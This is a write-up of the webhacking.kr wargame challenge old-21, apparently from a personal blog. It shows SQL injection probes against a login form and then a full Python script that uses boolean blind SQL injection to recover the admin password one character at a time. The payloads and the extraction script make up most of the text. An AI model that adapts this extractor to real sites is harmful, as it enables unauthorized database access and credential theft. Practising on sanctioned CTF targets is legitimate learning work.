[Webhacking.kr] old-21

old-21

This problem is in webhacking.kr.
URL: https://webhacking.kr/challenge/bonus-1/index.php/

If you enter the URL, you can see the below photo.

 

First, Admin Login

The result of "id: admin, pw: admin" is login fail

Second, SQL Injection

I tried to SQL Injection. admin' or '1'='1
Result: Wrong password

While I tried to "admin' or '1'='0".
Result: Wrong password

You can see that the values you entered this time are different from before.
Through this, I knew that ID is 'admin'.

Third, Blind SQL Injection (ID Length)

 

admin' and if(length(id)like(5),1,0) or '1'='0 (Result: Wrong Password)   
admin' and if(length(id)like(6),1,0) or '1'='0 (Result: login fail)    

This test certainly shows that the length of ID is 5.
In addition, we can access on the password through the result.

True: (Result: Wrong Password)

False: (Result: login fail)

Fourth, Blind SQL Injection (PW Length, PW)

Password Length Payload

for i in range(50):
    url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin\' and if(length(pw)like({}),1,0) or \'1'=\'0&pw=1".format(i)
    res = requests.get(url, headers=headers, cookies=cookies)

    if res.text.find('wrong password') > 0: 
        str_len = i

Password Payload

for i in range(1, str_len + 1):
    for j in range(48,128):
        url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin\' and if(ord(substr(pw,{},1))like({}),1,0) or \'1\'=\'0&pw=1".format(i,j)
        res = requests.get(url, headers=headers, cookies=cookies) 
        if res.text.find('wrong password') > 0:
            password += chr(j)
            break     

Result

import requests 

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117'}
cookies = {'PHPSESSID':'YOUR SESSION ID VALUE'}

def HttpRequest():
    str_len = 0
    password = ""
    
    for i in range(50):
        url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin\' and if(length(pw)like({}),1,0) or \'1'=\'0&pw=1".format(i)
        res = requests.get(url, headers=headers, cookies=cookies)

        if res.text.find('wrong password') > 0: 
            str_len = i
    
    for i in range(1, str_len + 1):
        for j in range(48,128):
            url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin\' and if(ord(substr(pw,{},1))like({}),1,0) or \'1\'=\'0&pw=1".format(i,j)
            res = requests.get(url, headers=headers, cookies=cookies) 
            if res.text.find('wrong password') > 0:
                password += chr(j)
                break
    
    print("Password Length: {}".format(str_len))
    print("Password: {}".format(password))

if __name__ == '__main__':
    HttpRequest()

Password Length: 36
Password: there_is_no_rest_for_the_white_angel